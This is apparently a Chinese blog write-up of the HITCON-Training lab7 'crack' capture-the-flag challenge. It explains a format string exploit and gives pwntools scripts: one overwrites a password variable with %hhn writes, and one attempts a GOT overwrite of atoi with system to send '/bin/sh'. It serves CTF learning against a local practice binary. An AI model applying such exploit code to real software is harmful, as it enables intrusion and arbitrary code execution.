暑假集训——Hitcon_Trainning——lab7_crack——格式化字符串漏洞

最新推荐文章于 2024-07-22 00:00:18 发布
最新推荐文章于 2024-07-22 00:00:18 发布
阅读量236 收藏
点赞数
分类专栏: hitcontrainning 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41667316/article/details/95616957
版权

格式化字符串漏洞

非getshell

思路

  • 按代码的逻辑来说,是要求猜一个随机数,如果这里的cat flag的确有这个flag的话,那么覆盖password成为指定内容就可以做完了。
    在这里插入图片描述
    在这里插入图片描述
    password是一个bss段的变量,而checksec发现

地址随机化没开,所以password的地址确定了。
在这里插入图片描述

  • payload
    在这里插入图片描述
    buf是第十个参数,干脆把他覆盖成0。然后再加上前面格式化字符串的长度,可以得到地址开始是第17个参数。
payload="%17$hhn%18$hhn%19$hhn%20$hhnA"+p32(0x0804a048)+p32(0x0804a049)+p32(0x0804a050)+p32(0x0804a051)

from pwn import *
import time 
#context.terminal = ['deepin-terminal', '-x', 'sh', '-c']

sh=process("./crack")
context.log_level='debug'

#gdb.attach(sh)
payload="%17$hhn%18$hhn%19$hhn%20$hhn"+p32(0x0804a048)+p32(0x0804a049)+p32(0x0804a04a)+p32(0x0804a04b)

sh.sendlineafter("name ? ",payload)
time.sleep(0.1)
sh.sendlineafter(':','0')

sh.interactive()
sh.close()

getshell

  • 我大胆想象一下,如果我把atoi的got表给改成system的plt表…
from pwn import *
import time 
#context.terminal = ['deepin-terminal', '-x', 'sh', '-c']

sh=process("./crack")
elf=ELF("./crack")
context.log_level='debug'

#gdb.attach(sh)

atoi_got_addr=elf.got['atoi']
system_plt_addr=elf.plt['system']

payload=fmtstr_payload(10,{atoi_got_addr:system_plt_addr})

sh.sendlineafter('? ',payload)
time.sleep(0.1)
sh.sendlineafter(':',"/bin/sh")

sh.interactive()
sh.close()

plt表是不可写的= =。
在这里插入图片描述

skyandcloud-pal
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hitcontraining_playfmt 解题思路
Morphy_Amo的博客
03-19 729
格式化字符串
houseoforange_hitcon_2016
fayinq的博客
04-07 262
houseoforange_hitcon_2016 先检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb里面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
HITCON-Training lab7(一道简单的格式化字符串漏洞
像初雪一样自由洒落
03-27 262
格式化字符串知道他的操作,可是做的一点也不熟练吧,,,BJDCTF上的r2t4不会啊,,,看不懂,,,所以就来补补格式化字符串的题目了,,,, 看到canary开启了,我还以为要泄漏canary呢,结果发现不用那么麻烦,,, 其实看下,思路很清晰,先让你输入东西,然后返回给你,然后你输入password,如果和程序中的一样,你就拿到flag了,, 所以输入的东西里面需要泄漏pa...
暑假集训——Hitcon_Trainning——lab9_playfmt——格式化字符串漏洞_字符串在bss段
qq_41667316的博客
07-13 751
格式化字符串漏洞 思路 一开始就是没有思路,太菜了,真的太菜了TAT。 这里的buf是在bss段,也就是意味着没有办法用常规方法做。 看了大佬的wp才知道可以控制ebp来实现地址任意写。 但是我觉得或许用栈迁移也可以试一下。 先写一波控制ebp! 控制ebp 首先,格式化字符串漏洞的两个利用方式 泄露栈上内容 改写某地址内容(前提是这个地址要在栈上,也就是printf可控的地方) 原理...
非栈上的格式化字符串漏洞(bss段)-playfmt
最新发布
zhuo1358的博客
07-22 856
已buu上的hitcontraining_playfmt为例没有开FULL RELRO,也就是说got表可改,那么我们的思路就是把printf的got表改成system,输入/bin/sh即可拿到shell最终exp把libc地址抓进栈中因为libc的地址只有低8位不同,通过写入低字节把printf_got抓到栈中把print_got+2抓入栈中(把print_got改成system要一半一半的改)把printf_got改成systemnum2是计算用来进行格式字符串漏洞利用时的一个重要部分。
[BUUCTF]PWN——hitcontraining_unlink
mcmuyanga的博客
01-25 1019
hitcontraining_unlink 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况,经典堆题的菜单 64位ida打开,发现了读出flag的函数?根据buu上的习性,不懂这个路径对不对 main() show() add() edit() delete() 由于存在堆溢出和这个读出flag的函数,我们可以修改fd和bk的值,尝试使用fastbin attack。 #coding:utf-8 from pwn import * conte
hitcontraining_playfmt
qq_62887641的博客
09-14 115
32位保护全关存在格式化字符串漏洞,并且是bss段,也就是非栈上的格式化字符串
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
c语言格式化字符漏洞,格式化字符串漏洞题目练习
weixin_30111277的博客
05-22 907
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1546
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
安全测试是确保系统和应用安全的关键环节,包括漏洞扫描、渗透测试和安全评估等,目的是发现并修复潜在的安全弱点。安全感知则强调提高用户对网络安全威胁的认识,通过教育和培训增强防范意识。HITCON GIRLS的读书会...
hitcontraining_magicheap-unlink
个人笔记
06-17 213
heaparray全局指针=0x6020C0;
HITCON-Training-Writeup
baikeng3674的博客
03-14 568
HITCON-Training-Writeup 原文链接M4x@10.0.0.55 项目地址M4x's github,欢迎star~ 更新时间5月16 复习一下二进制基础,写写HITCON-Training的writeup,题目地址:https://github.com/scwuaptx/HITCON-Training Outline Basic Knowledge In...
BUUCTF pwn wp 146 - 150
fa1c4的blog
04-30 581
hitcontraining_playfmt gwctf_2019_easy_pwn bctf2016_bcloud asis2016_b00ks warmup
攻防世界pwn supermarket + 实时数据监测
PLpa的博客
02-13 927
supermarket 这是一个典型的堆题,菜单类型。 只开了NX保护的32位程序。 我们来分析一下程序 程序实现了增删改查,其中改可以改价格和商品的描述,我们重点看改描述,因为程序的漏洞就在这里。 首先让我们输入商品的名字,通过名字来找到商品,这里我们就可以伪造商品了。继续往下看会看到程序让我们输入描述信息的size。通过程序分析我们知道(&s2)[v1]+5是结构体中存储堆的si...
buuctf magicheap
qq_42728977的博客
04-22 223
主要是unsorted bin 在拖链的时候的一些细节 参考
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1695
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
hitcontrainingUAF之我见
TedLau的博客
06-16 311
hictontrainingUAF,太菜学了几天才懂这里的门道。我觉得我理解了这个题...继续学吧!
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值